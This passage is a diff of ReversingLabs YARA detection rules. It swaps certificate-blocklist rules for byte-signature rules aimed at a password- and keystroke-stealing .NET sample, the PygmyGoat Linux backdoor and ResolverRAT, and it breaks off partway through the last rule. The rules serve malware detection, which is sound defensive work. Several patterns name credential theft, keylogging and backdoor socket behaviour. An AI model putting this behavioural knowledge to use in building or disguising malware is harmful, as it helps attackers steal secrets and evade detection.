+            ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 16 16 06 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 06
+        }
+		$get_passwords = {
+            1F ?? 8D ?? ?? ?? ?? 25 16 73 ?? ?? ?? ?? A2 25 17 73 ?? ?? ?? ?? A2 25 18 73 ?? ??
+            ?? ?? A2 25 19 73 ?? ?? ?? ?? A2 25 1A 73 ?? ?? ?? ?? A2 25 1B 73 ?? ?? ?? ?? A2 25
+            1C 73 ?? ?? ?? ?? A2 25 1D 73 ?? ?? ?? ?? A2 25 1E 73 ?? ?? ?? ?? A2 25 1F ?? 73 ??
+            ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 0A 73 ?? ?? ?? ??
+            25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 06 0C 16 0D 2B
+            ?? 08 09 9A 13 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE
+            ?? 09 17 58 0D 09 08 8E 69 32 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 ??
+            ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 02 39 ?? ?? ??
+            ?? 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 6F ??
+            ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D
+            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ??
+            11 ?? 6F ?? ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
+            12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07
+        }
+		$process_key_action = {
+            03 28 ?? ?? ?? ?? 2C ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 02 7B ?? ?? ?? ?? 1A
+            8D ?? ?? ?? ?? 25 16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ??
+            ?? ?? ?? A2 25 19 07 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ??
+            0C 02 17 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25
+            16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ?? ?? ?? ?? A2 25 19
+            08 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 02 11 ?? 16 9A A5 ?? ?? ??
+            ?? 11 ?? 17 9A A5 ?? ?? ?? ?? 11 ?? 18 9A A5 ?? ?? ?? ?? 11 ?? 19 9A 74 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 11 ?? 16 9A A5 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 03 04 11 ?? 19 9A 74
+            ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09
+            75 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 7B ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 0A 02 03 04 05 06 28
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "08:20:23:87:91:12:28:9b:f3:51:d2:97:cc:8e:fc:fc" and 1573430400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $get_tcp_connections ) or ( all of ( $get_operating_system_information_p* ) ) or ( $take_screenshot ) or ( $get_passwords ) or ( $process_key_action ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0D53690631Dd186C56Be9026Eb931Ae2 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Pygmygoat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PygmyGoat backdoor."
 		author = "ReversingLabs"
-		id = "4f60613c-4162-5b3d-989f-f79a06450f4d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c6ffe84d-c1ae-5856-bd49-4633b049f95c"
+		date = "2025-01-20"
+		modified = "2025-01-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4834-L4850"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.PygmyGoat.yara#L1-L135"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3d0a80c062800f935fa3837755e8a91245e01a4e2450a05fecab5564cb62c15c"
+		logic_hash = "11e076865bfc72b79ca42ca821e4c1d81ea705f3ba7711be8677b648ada859a1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "PygmyGoat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$create_backdoor_socket = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 30 89 74 08 ?? 8D 50 ?? 83 E2 ?? 29 D0 01 C1 83
+            E1 ?? C1 E9 ?? 89 D7 89 F0 F3 AB 83 EC ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 83 7D ?? ?? 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ??
+            8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
+            C0 ?? 89 45 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? 83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
+            ?? ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            83 EC ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ??
+            ?? ?? C6 40 ?? ?? 83 EC ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            66 C7 85 ?? ?? ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 83 C0 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
+            C0 ?? 89 45 ?? 83 EC ?? 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 74 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ??
+            83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
+            ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 8D
+            65 ?? 5B 5E 5F 5D C3
+        }
+		$backdoor_dataforward_p1 = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? BE ?? ?? ?? ??
+            BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 D1 89 C2 89 D7 89 F0 FC F3 AB 89 FA 89 4D ?? 89
+            55 ?? 8B 45 ?? 39 45 ?? 0F 4D 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 0F 88 ?? ?? ?? ??
+            83 7D ?? ?? 0F 88 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ??
+            ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ?? ?? ?? 83 EC ?? 6A ?? 6A
+            ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
+            79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83
+            E0 ?? 8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ??
+            ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
+        }
+		$backdoor_dataforward_p2 = {
+            C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 E0 ??
+            8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
+            ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00
+            83 F8 ?? 75 ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? EB ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ??
+            ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? EB ?? E9
+            ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? B8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
+        }
+		$main_constructor = {
+            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 89 45 ?? 8D
+            83 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 EC ?? 6A ?? 8D 45 ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 50
+            8D 83 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 83 EC ?? FF 75
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B 45 ?? 83 F8 ?? 77 ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C2 89 D0 83 EC ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 83 EC ?? 68 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 89 83 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 8B 83 ?? ?? ?? ??
+            83 EC ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 79 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C2 8B 83 ?? ?? ?? ?? 83 EC ?? 52 8D 55 ?? 52 50 E8 ??
+            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 75 ?? 83 EC
+            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 EC ?? 8D 83 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
+            ?? 8B 83 ?? ?? ?? ?? 83 EC ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? C9 C3
+        }
+		$hook_accept_function_p1 = {
+            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
+            74 ?? 8B 45 ?? 8B 00 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC
+            ?? FF 75 ?? FF 75 ?? FF 75 ?? 8B 45 ?? FF D0 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9
+            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 94 C0
+            0F B6 C0 89 45 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 81 65 ?? ?? ?? ?? ?? 83 EC ?? 6A
+            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? EB ?? 6A ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
+            7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 83 EC ?? 50 8D 83 ?? ?? ?? ??
+            50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? EB
+            ?? 83 EC ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 83 7D ?? ?? 76
+        }
+		$hook_accept_function_p2 = {
+            83 7D ?? ?? 76 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ?? ??
+            ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ??
+            ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
+            45 ?? 3B 45 ?? 75 ?? EB ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 81
+            7D ?? ?? ?? ?? ?? 7E ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC
+            ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8
+            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 00 83 EC ?? 50 6A ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 89 10 83 EC ?? FF 75 ?? FF 75 ?? FF 75 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 5D ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" and 1592190240 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $create_backdoor_socket ) and ( all of ( $backdoor_dataforward_p* ) ) and ( $main_constructor ) and ( all of ( $hook_accept_function_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_32119925A6Ce4710Aecc4006C28E749F : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Resolverrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ResolverRAT backdoor."
 		author = "ReversingLabs"
-		id = "cfd51cb8-bd04-5ede-a73e-e924815a01f0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f62f50b6-7d2d-570b-82c8-f6e741270f1e"
+		date = "2025-06-30"
+		modified = "2025-06-30"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4852-L4868"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.ResolverRAT.yara#L1-L94"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ca812cdfbb7ca984fae1e16159eb0eeb1e65767fcc6aa07eeb84966853146f9d"
+		logic_hash = "4847650c49d305ea3c3e1dd23efefe03c485cff78253a49e06ee45bb46ebf360"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "ResolverRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$run_visual_executor = {
+            7E ?? ?? ?? ?? 3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 1F
+            ?? 28 ?? ?? ?? ?? 0B 06 1F ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 73 ?? ?? ?? ?? 25 20
+            ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 20 ?? ?? ??
+            ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ??
+            20 ?? ?? ?? ?? 63 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B
+            ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 63 20 ??
+            ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 25 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E
+        }
+		$execute_mixed_executor = {
+            12 ?? (FE | 15) ?? ?? ?? ?? ?? 12 ?? 06 8C ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            7D ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            06 7B ?? ?? ?? ?? 59 76 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ?? 20 ?? ??
+            ?? ?? 61 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 1A 8D ?? ?? ?? ?? 25 16 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2
+            25 17 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 25 18 12 ?? 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 25 19 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ??
+            ?? ?? ?? A2 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DD ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 20 ??
+            ?? ?? ?? 58 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28
+        }
+		$write_connection = {
+            7E ?? ?? ?? ?? 0A 16 0B 06 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0C 08 8E 69 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 20 ?? ?? ??
+            ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ??
+            09 16 09 8E 69 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ??
+            08 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 16 13 ?? 11 ?? 16 6A 7E
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 17 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 11 ?? 16 11 ??
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 7E ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 25 13 ?? 16 3D ?? ?? ?? ?? DD ?? ?? ?? ?? 11 ?? 39 ?? ?? ?? ?? 11 ?? 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 08 16 08 8E 69 7E ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ?? 06 7E
+        }
+		$read_sorter_enumerator = {
+            03 3A ?? ?? ?? ?? DD ?? ?? ?? ?? 03 75 ?? ?? ?? ?? 3A ?? ?? ?? ?? 03 75 ?? ?? ?? ??
+            0A 06 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 25 3A ?? ?? ??
+            ?? 26 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 DD ?? ?? ?? ??
+            73 ?? ?? ?? ?? 25 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 07 7E ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 25 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 80 ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 14 0C 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 7E
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ??
